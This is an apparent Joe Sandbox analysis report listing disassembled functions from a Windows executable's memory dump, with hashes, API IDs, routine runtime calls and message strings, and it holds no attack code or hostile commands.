                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: verbose
                                                                                                                                                                                                                          • API String ID: 3215553584-579935070
                                                                                                                                                                                                                          • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                          • Instruction ID: 0a5c36030b87fc5d76ffea6bc4dc068f88afea5c9efa78f4ec6336f90f23003e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42918122A0C64A81E7A6BE25D46037D36D1AB80B58F884136DA5EC7BE5DF3CF4478342
                                                                                                                                                                                                                          Function 00007FF641F3EED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                          • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                          • Instruction ID: a40eb794d7593472c3402a88314c33f723f0272d2e6d4da0f3fa7fb1489b88c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E819CB2E0C20BC5FBE77E29D11027966E0AB12B48F558035DA0ED7AD5DF2DE9439603
                                                                                                                                                                                                                          Function 00007FF641F2C968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                          • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                          • Instruction ID: 8290f90d64dd1216b5379b104bd6231e8c664497fee9e8ab92a0fd9bb1848711
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A851AF3AB1D6828ADB96FB15E414AB977D1EB44B88F548130DA4D837C4EF7EE842C700
                                                                                                                                                                                                                          Function 00007FF641F2E1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                          • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                          • Instruction ID: 401d0e91934f334a51a7c868099533b63e69ffa814db80927673f9bef5a6b04f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05617C32A0CBC585D7A2AB15E4403EAB7A0FB85794F144225EB9C43BDADF7DE191CB00
                                                                                                                                                                                                                          Function 00007FF641F2E5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                          • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                          • Instruction ID: 6cf0da1144b10d95b722f030f1893c6a95db3817b85a84a3bdddbeba2bd644ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24519072B1C2C286EBB5BB2190543A87BD0EB54B94F244135DA6D87BD6CF3EE452CB01
                                                                                                                                                                                                                          Function 00007FF641F27530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,?,00007FF641F2324C,?,?,00007FF641F23964), ref: 00007FF641F27642
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateDirectory
                                                                                                                                                                                                                          • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                          • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                          • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                          • Instruction ID: 3080bf867c1f1e6bcd3d44f32ed38cfceccad4573ccc06d7b4f51c3d7ca14aac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC31C561A1DAC145EBB2BB25E4107EA62D4EB94BE0F444331EE6D837C9EF2CD2068700
                                                                                                                                                                                                                          Function 00007FF641F22870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                          • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                                                          • API String ID: 1878133881-2698358428
                                                                                                                                                                                                                          • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                          • Instruction ID: 0b12d76c933e147f16b7ab6f5eb4d92bcfcdfe4f4076c5e78149d00928e58498
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58118B7262CA8581FBA2BB10F951BE973A4FB44B84F905135DA8D87685CF3DD60AC704
                                                                                                                                                                                                                          Function 00007FF641F225F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                          • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                          • API String ID: 1878133881-653037927
                                                                                                                                                                                                                          • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                          • Instruction ID: 7a031847d0ea60b1451ce2148fee9864f1de37964c4f3073289876272064bdd6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92119D7262CB8581FBA1BB10F951BE933A4FB44B84F905135DA4C87685CF3DD60AC704
                                                                                                                                                                                                                          Function 00007FF641F3B8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                                                                                                          • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                          • Instruction ID: 7caeac66c2c06d5285d6954c26c6832ff2aa86b626e3137aaaeafd2db78decf6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD1DE32B2CA8589E762EF69D4502AC37A1FB447D8B144226CE5E97FD9DE38D007C309
                                                                                                                                                                                                                          Function 00007FF641F3EC9C Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                                                                                          • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                                          • Instruction ID: bc87d278eb1abca221164b2ea97e8cca1af883d9c1519169da1986953ec2275d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0510372F0861A8AEB95FF6499552BC27E1AF10758F110135DD1E93EE6DF38A443C702
                                                                                                                                                                                                                          Function 00007FF641F34A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2780335769-0
                                                                                                                                                                                                                          • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                                          • Instruction ID: 53cff9c26b31722431c03e534cee2c21a71ba83ca0f055b91b7fcecc594d4744
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99517822A0C6458AFB95FFB1D4403BD23E1AB48B98F148135DE0987A89DF38D4838752
                                                                                                                                                                                                                          Function 00007FF641F22030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1956198572-0
                                                                                                                                                                                                                          • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                          • Instruction ID: ab310ddc08292eca36e7a18974552602556a7d0fa3ccb8ddc192f8d0194ff0db
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A118A31A1C18241F796FBAAE9442F913D2EF94790F448431DE4D47BDACD2DD4C28504
                                                                                                                                                                                                                          Function 00007FF641F2C330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                          • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                          • Instruction ID: 76613591210bd4b6f1c4b46190c643d03f4f1a5035b3fa540cd74f3745ee735a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4114832B18F058AEB41AF60E8442A933A4FB59758F040E31DA2D87BA5DF78D2998340
                                                                                                                                                                                                                          Function 00007FF641F44E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                          • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                          • Instruction ID: 98204669ad9fdefa0ca2d72b3f5829b29df203948c5beab1401836340599c210
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7411622A0C68646FBA6BB25D60537A66D0EFA0BA8F104235EE5D97ED5DF3CD443C700
                                                                                                                                                                                                                          Function 00007FF641F3832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F3835E
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: RtlFreeHeap.NTDLL(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C6E
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: GetLastError.KERNEL32(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C78
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF641F2BEC5), ref: 00007FF641F3837C
                                                                                                                                                                                                                          Strings
